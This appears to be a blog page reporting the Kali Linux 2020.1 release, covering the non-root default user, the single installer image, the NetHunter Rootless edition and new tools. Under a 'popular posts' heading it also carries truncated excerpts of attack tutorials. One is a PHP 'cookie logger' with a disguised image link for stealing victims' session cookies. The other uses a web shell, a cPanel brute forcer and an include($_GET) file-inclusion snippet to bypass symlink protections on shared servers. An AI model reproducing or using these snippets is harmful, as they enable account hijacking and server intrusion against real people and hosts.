Skip to main content

Kali Linux 2020.1 Released with New Tools, adds Non-Root by Default & NetHunter Rootless Edition

Kali Linux 2020.1

Kali Linux 2020.1 released with new tools, improvements to theme & kali-undercover, adds Non-Root by default and Kali single installer image.
With the release as previously announced, Kali Linux moved to a traditional default non-root user and also announced NetHunter Rootless Edition.

Kali Linux 2020.1

Earlier this year kali Linux team at Offensive Security announced the move to the “traditional default non-root user” model, now the changes to effect with version 2020.1.
Earlier kali inherited the default root policy from its predecessors, starting from Kali 2020.1 there is no longer a superuser account and default user now is a standard, unprivileged, user.
The change was made due to security reasons, so no more root/toor it should be kali/kali.
Kali Linux 2020.1
Kali as the new username & password
Another notable change is the Single Installer Image, Kali no longer offer images for every desktop environment (DE). Instead, they now provide a single image and ask you to select your desktop environment.
The new edition also lets users select the tools to be included with the installation. To install a custom image except for Xfce and default packages, it requires an Internet connection.
Installation
With the Installer image, the live mode is not included, if you want to use live mode then you need to have a live image.
ARM images for 2020.1 continue to run as root by default and the Pinebook Pro isn’t included in the 2020.1 release, “We are still working on getting it added, and as soon as it is ready we will post it.”

NetHunter Rootless

The mobile pentesting platform also comes with new improvements, one of the major changes is that you no longer required to root your phone to run Kali NetHunter.
Here are the three NetHunter editions
  • NetHunter – Needs rooted devices with custom recovery and patched kernel. Has no restrictions. Device-specific images are available here.
  • NetHunter Light – Needs rooted devices with custom recovery but no custom kernel. Has minor restrictions, i.e. no WiFi injection or HID support. Architecture specific images are available here.
  • NetHunter Rootless – Installable on all stock standard, unmodified devices using Termux. Some limitations, like lack of db support in Metasploit and no root permissions. Installation instruction is available here.
Kali Linux 2020.1
NetHunter
With the NetHunter Rootless, the non-root user also has full privileges in the chroot due to how proot containers work.

Theming & Kali-Undercover

New themes included for Gnome users, it includes both the light and the dark versions. Icons used in the menu also replaced.
Enhancements did with Kali-Undercover mode to make it feel even more like using a Windows operating system.
Kali Linux 2020.1
Kali-Undercover

New Packages & Python 2

New tools such as cloud-enum, emailharvester, phpggc, sherlock, splinter are added and few existing tools were upgraded.
As Python 2 reached the end of life on the 1st of January 2020, the tools that developed based on Python 2 are removed.
Existing users can upgrade to the new version and the fresh images can be downloaded from here.

Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h

Cookie Logger

         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary

|Bypass Symlink on 2013 Server With Different .htaccess and Methods by Sen Haxor |

Hi, Guys,  Please a wonderfull tutorial provided bt Sem;\  Today I gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods. So let's Get Started :) Note: This method is not applicable for Godaddy, Bluehost, Hostgator and Hostmonstor Servers. For This First You Need the Following Files : 1 -> Sen Haxor CGI Shell 2 -> sen.zip 3 -> passwd-bypass.php 4 -> Turbo Brute force Cpanel 5 - > Port.py First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server . Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php with <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo